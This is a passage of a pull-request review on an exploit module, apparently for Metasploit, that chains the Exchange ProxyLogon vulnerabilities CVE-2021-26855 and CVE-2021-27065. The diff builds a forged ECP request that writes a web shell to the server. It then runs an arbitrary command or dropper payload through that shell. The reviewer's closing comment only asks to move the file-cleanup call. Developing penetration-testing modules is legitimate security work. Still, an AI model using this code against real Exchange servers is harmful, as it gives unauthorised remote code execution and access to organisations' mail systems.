modules/exploits/windows/http/exchange_proxylogon_rce.rb

```diff
@@ -0,0 +1,532 @@
+    remote_path = "\\\\127.0.0.1\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\#{remote_file}"
+
+    data = {
+      'identity': {
+        '__type': 'Identity:ECP',
+        'DisplayName': (exploit_info[4][0]).to_s,
+        'RawIdentity': (exploit_info[4][1]).to_s
+      },
+      'properties': {
+        'Parameters': {
+          '__type': 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
+          'FilePathName': remote_path.to_s
+        }
+      }
+    }.to_json
+
+    response = send_http(
+      'POST',
+      "Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~1942062522",
+      data: data,
+      cookie: exploit_info[2],
+      ctype: 'application/json; charset=utf-8',
+      headers: {
+        'msExchLogonMailbox' => patch_sid(exploit_info[1]),
+        'msExchTargetMailbox' => patch_sid(exploit_info[1]),
+        'X-vDirObjectId' => (exploit_info[4][1]).to_s
+      }
+    )
+    return '' if response.code != 200
+
+    remote_file
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      case check
+      when CheckCode::Vulnerable
+        print_good('The target appears to be vulnerable')
+      when CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')
+      else
+        fail_with(Failure::Unknown, 'The target vulnerability state is unknown')
+      end
+    end
+
+    @proto = (ssl ? 'https' : 'http')
+    @random_uri = normalize_uri('ecp', "#{rand_text_alpha(1..3)}.js")
+
+    print_status(message('Attempt to exploit for CVE-2021-26855'))
+    exploit_info = run_cve_2021_26855
+
+    print_status(message('Attempt to exploit for CVE-2021-27065'))
+    shell_info = run_cve_2021_27065(exploit_info)
+
+    @random_inputname = shell_info[0]
+    @random_filename = shell_info[1]
+
+    print_good("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")
+    remote_file = "#{datastore['ExchangeBasePath']}\\FrontEnd\\HttpProxy\\#{datastore['ExchangeWritePath']}\\#{@random_filename}"
+
+    # trigger powa!
+    case target['Type']
+    when :windows_command
+      if cmd_windows_generic?
+        vprint_status("Generated payload: #{payload.encoded}")
+
+        print_warning('Dumping command output in response')
+
+        cmd = payload.encoded
+        cmd = cmd.gsub('\\', '\\\\\\').gsub('&', '\u0026')
+        cmd = cmd.gsub('"', '\\"')
+        response = execute_command(cmd)
+
+        output = response.body.split('Name                            :')[0]
+        if output.empty?
+          print_error('Empty response, no command output')
+          return
+        end
+        print_line(output)
+      end
+    when :windows_dropper
+      cmd = generate_cmdstager[0].gsub('\\', '\\\\\\').gsub('&', '\u0026')
+      execute_command(cmd)
+    end
+    register_files_for_cleanup(remote_file)
```

Comment:
This should be placed before calling `execute_command` to work properly. I suggest to move this line right before `case target['Type']`.